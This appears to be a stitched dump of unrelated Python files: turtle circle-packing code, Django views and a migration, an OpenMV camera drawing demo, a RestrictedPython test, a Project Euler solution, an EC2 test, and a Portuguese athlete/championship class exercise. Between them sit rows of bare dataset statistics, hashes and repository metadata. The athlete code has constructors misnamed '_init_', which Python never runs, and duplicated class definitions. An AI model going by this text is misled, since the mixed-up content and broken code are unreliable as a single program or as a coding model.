                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            newlist.append(newCircle)
                            if recursive:
                                newCircle.extendedCards(numberofoutsidecircles)
                                for eachCard in newCircle.cardinals:
                                    circlelist.append(eachCard)
        for item in newlist:
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    fvh2.savetocircles(a.lm)
    return circlelist
def yadei(startdiameter,numberofoutsidecircles, recursive=False, lm=None):
    # "yet another drawing, extended inner": like ...withcontinueandextended
    # but seeds with innerextendedCards() and does NOT add the seed's
    # cardinals to circlelist — only the seed itself starts the expansion.
    # Returns the final circle list.
    global masterCircleSet
    masterCircleSet=set()  # fresh dedupe state per call
    if not lm:
        lm=fvh2.fvh.MyTurtle()
        lm.setup()
    smallestsize=startdiameter
    a=Circle(0,0,startdiameter,lm)
    a.innerextendedCards(numberofoutsidecircles)
    circlelist=[]
    circlelist.append(a)
    totalbefore=len(masterCircleSet)
    totalafter=0
    while ((totalbefore!=totalafter)):
        print "Just started new while loop. number of circles in circlelist: "+str(len(circlelist))
        totalbefore=len(masterCircleSet)
        newlist=[]
        for firstCircle in circlelist:
            for secondCircle in circlelist:
                thisDiameter=min(firstCircle.radius, secondCircle.radius)/2.0
                if (min(firstCircle.radius, secondCircle.radius)<=4):
                    continue  # pair too small; keep scanning other partners
                if thisDiameter<smallestsize:
                    smallestsize=thisDiameter
                newCircles=checkCircles(firstCircle, secondCircle)
                if newCircles:
                    for x in newCircles:
                        if ((int(x[0])/MINOFFSET*MINOFFSET, int(x[1])/MINOFFSET*MINOFFSET, thisDiameter) not in masterCircleSet):
                            newCircle=Circle(x[0], x[1],thisDiameter,lm)
                            newlist.append(newCircle)
                            if recursive:
                                newCircle.innerextendedCards(numberofoutsidecircles)
                                for eachCard in newCircle.cardinals:
                                    circlelist.append(eachCard)
        for item in newlist:
            circlelist.append(item)
        newlist=[]
        totalafter=len(masterCircleSet)
        if (totalafter==totalbefore):
            print "no more moves"
    fvh2.savetocircles(a.lm)
    return circlelist
def itsOct():
    # Placeholder stub; no implementation yet.
    pass
| 34.130264
| 257
| 0.662697
| 3,790
| 34,847
| 6.090501
| 0.065699
| 0.035351
| 0.022614
| 0.02426
| 0.871334
| 0.850583
| 0.830221
| 0.819261
| 0.80947
| 0.804402
| 0
| 0.016261
| 0.216461
| 34,847
| 1,020
| 258
| 34.163725
| 0.829146
| 0.112262
| 0
| 0.799197
| 0
| 0
| 0.030815
| 0.004493
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.001339
| 0.004016
| null | null | 0.03079
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9830fcb857d526b4820441836a1d74c1992e4612
| 171
|
py
|
Python
|
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
ot/views.py
|
marclanepitt/ot
|
3cf4c24cd412735b93e56175ffa31c3eecba8ee5
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def HomeView(request):
    """Render the static site landing page."""
    template_name = 'site_home.html'
    return render(request, template_name)
def AboutView(request):
    """Render the static about page."""
    template_name = 'about.html'
    return render(request, template_name)
| 24.428571
| 45
| 0.748538
| 22
| 171
| 5.772727
| 0.636364
| 0.204724
| 0.299213
| 0.409449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 171
| 7
| 46
| 24.428571
| 0.863946
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
983f4f7294d1c45f6ca7de2184dcf0e247274760
| 5,438
|
py
|
Python
|
usr/examples/03-Drawing/crazy_drawing.py
|
SSSnow/MDV3
|
5f21f9bbc04bccc1c060cebd74a4e1781c10aa00
|
[
"MIT"
] | 6
|
2017-05-24T06:51:37.000Z
|
2020-07-04T16:36:29.000Z
|
usr/examples/03-Drawing/crazy_drawing.py
|
Killercotton/OpenMV_OV7670
|
c4130052fc6e0f2eed2089222b3b1f2573c9825f
|
[
"MIT"
] | null | null | null |
usr/examples/03-Drawing/crazy_drawing.py
|
Killercotton/OpenMV_OV7670
|
c4130052fc6e0f2eed2089222b3b1f2573c9825f
|
[
"MIT"
] | 1
|
2019-10-21T11:08:37.000Z
|
2019-10-21T11:08:37.000Z
|
# Crazy Drawing Example
#
# This example shows off your OpenMV Cam's built-in drawing capabilities. This
# example was originally a test but serves as good reference code. Please put
# your IDE into non-JPEG mode to see the best drawing quality.

import pyb, sensor, image, math

sensor.reset()
sensor.set_framesize(sensor.QVGA)

# Every primitive is exercised in both pixel formats.
_FORMATS = (sensor.GRAYSCALE, sensor.RGB565)


def _rand_x(img):
    # Random x, deliberately allowed off-screen: [-width//2, 3*width//2).
    return (pyb.rng() % (2*img.width())) - (img.width()//2)


def _rand_y(img):
    # Random y, deliberately allowed off-screen: [-height//2, 3*height//2).
    return (pyb.rng() % (2*img.height())) - (img.height()//2)


while(True):
    # Test Set Pixel (white is a scalar in grayscale, a tuple in RGB565)
    for fmt, white in ((sensor.GRAYSCALE, 255), (sensor.RGB565, (255, 255, 255))):
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                img.set_pixel(_rand_x(img), _rand_y(img), white)

    # Test Draw Line
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                x0 = _rand_x(img)
                y0 = _rand_y(img)
                x1 = _rand_x(img)
                y1 = _rand_y(img)
                img.draw_line([x0, y0, x1, y1])

    # Test Draw Rectangle
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                x = _rand_x(img)
                y = _rand_y(img)
                w = (pyb.rng() % img.width())
                h = (pyb.rng() % img.height())
                img.draw_rectangle([x, y, w, h])

    # Test Draw Circle
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                x = _rand_x(img)
                y = _rand_y(img)
                r = (pyb.rng() % (img.width() if (img.width() > img.height()) else img.height()))
                img.draw_circle(x, y, r)

    # Test Draw String
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                img.draw_string(_rand_x(img), _rand_y(img), "Hello\nWorld!")

    # Test Draw Cross
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                img.draw_cross(_rand_x(img), _rand_y(img))

    # Test Draw Keypoints
    for fmt in _FORMATS:
        sensor.set_pixformat(fmt)
        for i in range(10):
            img = sensor.snapshot()
            for j in range(100):
                x = _rand_x(img)
                y = _rand_y(img)
                a = (pyb.rng() % (2*math.pi))
                img.draw_keypoints([(x, y, a)])
| 39.985294
| 93
| 0.503678
| 764
| 5,438
| 3.54712
| 0.109948
| 0.088561
| 0.087823
| 0.118081
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0.863838
| 0
| 0.048077
| 0.292387
| 5,438
| 135
| 94
| 40.281481
| 0.656185
| 0.065281
| 0
| 0.947368
| 0
| 0
| 0.005128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008772
| 0
| 0.008772
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
984cb898e2851daa433e2e4dd369d4cf167238af
| 170
|
py
|
Python
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 236
|
2015-01-03T17:14:53.000Z
|
2022-03-01T15:52:46.000Z
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 149
|
2016-10-24T06:56:44.000Z
|
2022-02-24T08:09:10.000Z
|
tests/transformer/test_assert.py
|
rahulbahal7/restricted-python
|
c39cffe71dfc30630e946977735303d3a65b0383
|
[
"ZPL-2.1"
] | 30
|
2015-04-03T05:38:13.000Z
|
2021-11-10T05:13:38.000Z
|
from tests.helper import restricted_exec
def test_RestrictingNodeTransformer__visit_Assert__1():
    """It allows assert statements."""
    # A bare assert is permitted, so restricted_exec must not raise here.
    restricted_exec('assert 1')
| 24.285714
| 55
| 0.782353
| 20
| 170
| 6.25
| 0.75
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013514
| 0.129412
| 170
| 6
| 56
| 28.333333
| 0.831081
| 0.164706
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
98793af1d2a1730aeaf0a67933baaa6757991887
| 1,357
|
py
|
Python
|
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
Largest_product_in_series.py
|
tuyenta/Project-Euler-Solutions
|
7480f39351e71afaf9285a5730ab5dc1c8adb0c8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 18 10:36:17 2019

@author: tuyenta

Project Euler 8: greatest product of WINDOW adjacent digits in the
1000-digit number `s`.
"""

WINDOW = 13  # number of adjacent digits multiplied together

s = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"

largestProduct = 0
# Slide a WINDOW-digit window across the string. The upper bound is
# len(s) - WINDOW + 1 so the final window (ending on the last digit) is
# included; the original len(s) - 13 bound skipped it (off-by-one).
for i in range(0, len(s) - WINDOW + 1):
    product = 1
    for j in range(i, i + WINDOW):
        product *= int(s[j])
    if product > largestProduct:
        largestProduct = product
print (largestProduct)
| 61.681818
| 1,006
| 0.884304
| 52
| 1,357
| 23.076923
| 0.653846
| 0.011667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.814992
| 0.075903
| 1,357
| 22
| 1,007
| 61.681818
| 0.141946
| 0.071481
| 0
| 0
| 0
| 0
| 0.798722
| 0.798722
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f3456525e16a28ff65bdae2bcdeda6075e74b3f
| 343
|
py
|
Python
|
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
tests/internal/instance_type/test_instance_type_h_auto.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
# Testing module instance_type.h
import pytest
import ec2_compare.internal.instance_type.h
def test_get_internal_data_instance_type_h_get_instances_list():
    # The generated instance list for the "h" family must be non-empty.
    assert len(ec2_compare.internal.instance_type.h.get_instances_list()) > 0
def test_get_internal_data_instance_type_h_get():
    # The module-level `get` container must also be non-empty.
    assert len(ec2_compare.internal.instance_type.h.get) > 0
| 34.3
| 75
| 0.845481
| 56
| 343
| 4.732143
| 0.339286
| 0.271698
| 0.29434
| 0.241509
| 0.826415
| 0.826415
| 0.611321
| 0.611321
| 0.611321
| 0
| 0
| 0.015773
| 0.075802
| 343
| 9
| 76
| 38.111111
| 0.820189
| 0.087464
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
7f99395d006207eb956af04a6f570e6ac0ee2c30
| 5,590
|
py
|
Python
|
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
related_name/migrations/0001_initial.py
|
thinkAmi-sandbox/django_30-sample
|
5ce2408a27100b0975f92c0f99a15671ad0c2465
|
[
"Unlicense"
] | null | null | null |
# Generated by Django 3.0.6 on 2020-06-14 05:26
from django.db import migrations, models
import django.db.models.deletion
# NOTE(review): auto-generated Django migration (header says Django 3.0.6,
# 2020-06-14). Generated migrations are normally left untouched; the comments
# below are review annotations only. The app demonstrates ForeignKey
# `related_name` variants against a shared `Color` model.
class Migration(migrations.Migration):

    # First migration of the `related_name` app.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Color',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='色')),
            ],
        ),
        # `abstract: False` in options: model was declared via an abstract base.
        migrations.CreateModel(
            name='Potato',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='potato_bud_colors', to='related_name.Color')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Fruit',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruit_bud_colors', to='related_name.Color')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='AppleWithRelatedName',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='my_apple_color', to='related_name.Color')),
            ],
        ),
        # Three FKs to the same model; `default_related_name` supplies the
        # reverse name where the field does not set one explicitly.
        migrations.CreateModel(
            name='AppleWith3Color',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='default_colors', to='related_name.Color')),
                ('fruit_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruit_colors', related_query_name='my_fruit_colors', to='related_name.Color')),
                ('leaf_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='leaf_colors', to='related_name.Color')),
            ],
            options={
                'default_related_name': 'default_colors',
            },
        ),
        migrations.CreateModel(
            name='AppleWith2Color',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('bud_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='buds', to='related_name.Color')),
                ('fruit_color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='fruits', to='related_name.Color')),
            ],
        ),
        # related_name='+' disables the reverse relation entirely (Django docs).
        migrations.CreateModel(
            name='AppleNoReverseWithPlus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='related_name.Color')),
            ],
        ),
        # A related_name ending in '+' also suppresses the reverse accessor.
        migrations.CreateModel(
            name='AppleNoReverseWithEndPlus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='end_plus+', to='related_name.Color')),
            ],
        ),
        # The templated default_related_name was expanded by the generator into
        # the concrete 'related_name_appledefaultrelatedname_list' on the field.
        migrations.CreateModel(
            name='AppleDefaultRelatedName',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_name_appledefaultrelatedname_list', to='related_name.Color')),
            ],
            options={
                'default_related_name': '%(app_label)s_%(class)s_list',
            },
        ),
        # Baseline: no related_name, so Django's default reverse name applies.
        migrations.CreateModel(
            name='Apple',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30, unique=True, verbose_name='品種名')),
                ('color', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='related_name.Color')),
            ],
        ),
    ]
| 50.818182
| 188
| 0.597138
| 579
| 5,590
| 5.56304
| 0.127807
| 0.088792
| 0.056504
| 0.088792
| 0.822726
| 0.813412
| 0.811549
| 0.75815
| 0.73145
| 0.73145
| 0
| 0.008937
| 0.259392
| 5,590
| 109
| 189
| 51.284404
| 0.769082
| 0.00805
| 0
| 0.637255
| 1
| 0
| 0.147213
| 0.025077
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6bd32f46d54d98cc09632370c1ad80e2609554b
| 5,521
|
py
|
Python
|
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
atvpolimorfismo.py
|
Patricia-Silva1/atividade
|
f294c52a8156a5b69972d0190deedccab6c5df2f
|
[
"MIT"
] | null | null | null |
class Atletas:
    """Base athlete record: name, age and accumulated score."""

    def __init__(self, nome, idade, pontuacao):
        # Bug fix: the constructor was named `_init_` (single underscores), so
        # Python never invoked it and instances were created without any
        # attributes set.
        self.nome = nome
        self.idade = idade
        self.pontuacao = pontuacao
class Amador(Atletas):
    """Amateur athlete tier (amador only)."""

    def __init__(self, nome, idade, pontuacao):
        # Bug fix: was `_init_`, which Python never calls. Base attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.idade = idade
        self.pontuacao = pontuacao
        self.amador = True
        self.profissional = False
        self.lenda = False
class Profissional(Atletas):
    """Professional athlete tier (amador + profissional)."""

    def __init__(self, nome, idade, pontuacao):
        # Bug fix: was `_init_`, which Python never calls. Base attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.idade = idade
        self.pontuacao = pontuacao
        self.amador = True
        self.profissional = True
        self.lenda = False
class Lenda(Atletas):
    """Legend athlete tier (amador + profissional + lenda)."""

    def __init__(self, nome, idade, pontuacao):
        # Bug fix: was `_init_`, which Python never calls. Base attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.idade = idade
        self.pontuacao = pontuacao
        self.amador = True
        self.profissional = True
        self.lenda = True
class Patrocinadores:
    """Sponsor record: name and sponsorship value."""

    def __init__(self, nome, valor):
        # Bug fix: the constructor was named `_init_` (single underscores), so
        # Python never invoked it and instances had no attributes.
        self.nome = nome
        self.valor = valor
class Campeonato:
    """Base championship: venue data plus athlete and sponsor rosters.

    `vencedor` awards 0 points in the base class; circuit subclasses
    override it with their own point value.
    """

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: the constructor was named `_init_` (single underscores), so
        # Python never invoked it and instances had no attributes.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_atletas(self, *novo_atleta):
        # Append each athlete passed as a positional argument.
        for atleta in novo_atleta:
            self.atletas.append(atleta)

    def adicionar_patrocinador(self, *novo_patrocionio):
        # Append each sponsor passed as a positional argument.
        for empresa in novo_patrocionio:
            self.patrocinadores.append(empresa)

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 0
                # Bug fix: the format string has two placeholders but was given
                # only one argument, raising IndexError whenever a winner
                # matched. Pass the score as the second argument, matching the
                # subclasses' message.
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
class CircuitoAmador(Campeonato):
    """Amateur circuit: any athlete may join; a win is worth 10 points."""

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: was `_init_`, which Python never calls. Attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_patrocinador(self, *novo_patrocionio):
        # No restriction: delegate to the base implementation.
        return super().adicionar_patrocinador(*novo_patrocionio)

    def adicionar_atletas(self, *novo_atleta):
        # No restriction: delegate to the base implementation.
        return super().adicionar_atletas(*novo_atleta)

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 10
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
class CircuitoProfissional(Campeonato):
    """Professional circuit: professionals/legends only; a win is worth 50."""

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: was `_init_`, which Python never calls. Attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_patrocinador(self, *novo_patrocionio):
        return super().adicionar_patrocinador(*novo_patrocionio)

    def adicionar_atletas(self, *novo_atleta):
        # Only professionals and legends may enter this circuit.
        # NOTE(review): the early return aborts on the first rejected athlete,
        # skipping any remaining candidates — confirm this is intended.
        for atleta in novo_atleta:
            if atleta.profissional == True or atleta.lenda == True:
                self.atletas.append(atleta)
            else:
                return print('Está categoria não pode fazer parte deste circuito.')

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 50
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
# NOTE(review): duplicate definition — this re-declares CircuitoAmador with the
# same body as the one defined earlier in the file and shadows it; one of the
# two should be removed.
class CircuitoAmador(Campeonato):
    """Amateur circuit: any athlete may join; a win is worth 10 points."""

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: was `_init_`, which Python never calls. Attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_patrocinador(self, *novo_patrocionio):
        return super().adicionar_patrocinador(*novo_patrocionio)

    def adicionar_atletas(self, *novo_atleta):
        return super().adicionar_atletas(*novo_atleta)

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 10
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
# NOTE(review): duplicate definition — this re-declares CircuitoProfissional
# with the same body as the one defined earlier in the file and shadows it;
# one of the two should be removed.
class CircuitoProfissional(Campeonato):
    """Professional circuit: professionals/legends only; a win is worth 50."""

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: was `_init_`, which Python never calls. Attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_patrocinador(self, *novo_patrocionio):
        return super().adicionar_patrocinador(*novo_patrocionio)

    def adicionar_atletas(self, *novo_atleta):
        # Only professionals and legends may enter this circuit.
        # NOTE(review): the early return aborts on the first rejected athlete,
        # skipping any remaining candidates — confirm this is intended.
        for atleta in novo_atleta:
            if atleta.profissional == True or atleta.lenda == True:
                self.atletas.append(atleta)
            else:
                return print('Está categoria não pode fazer parte deste circuito.')

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 50
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
class CircuitoLenda(Campeonato):
    """Legend circuit: legends only; a win is worth 100 points."""

    def __init__(self, nome, local, premiacao, patrocinadores, atletas):
        # Bug fix: was `_init_`, which Python never calls. Attributes are
        # assigned directly because the base class in this file also misnames
        # its constructor `_init_`, so super().__init__ cannot be relied on.
        self.nome = nome
        self.local = local
        self.premiacao = premiacao
        self.patrocinadores = patrocinadores
        self.atletas = atletas

    def adicionar_patrocinador(self, *novo_patrocionio):
        return super().adicionar_patrocinador(*novo_patrocionio)

    def adicionar_atletas(self, *novo_atleta):
        # Only legends may enter this circuit.
        # NOTE(review): the early return aborts on the first rejected athlete,
        # skipping any remaining candidates — confirm this is intended.
        for atleta in novo_atleta:
            if atleta.lenda == True:
                self.atletas.append(atleta)
            else:
                return print('Está categoria não pode fazer parte deste circuito.')

    def vencedor(self, nome_vencedor):
        for atleta in self.atletas:
            if nome_vencedor == atleta.nome:
                atleta.pontuacao += 100
                print('O atleta {} ficou com {} pontos'.format(
                    nome_vencedor, atleta.pontuacao))
| 34.080247
| 106
| 0.649158
| 598
| 5,521
| 5.827759
| 0.090301
| 0.045911
| 0.03472
| 0.047346
| 0.889527
| 0.889527
| 0.877188
| 0.866858
| 0.866858
| 0.837016
| 0
| 0.00292
| 0.255751
| 5,521
| 161
| 107
| 34.291925
| 0.845218
| 0
| 0
| 0.803419
| 0
| 0
| 0.061402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.076923
| 0
| 0
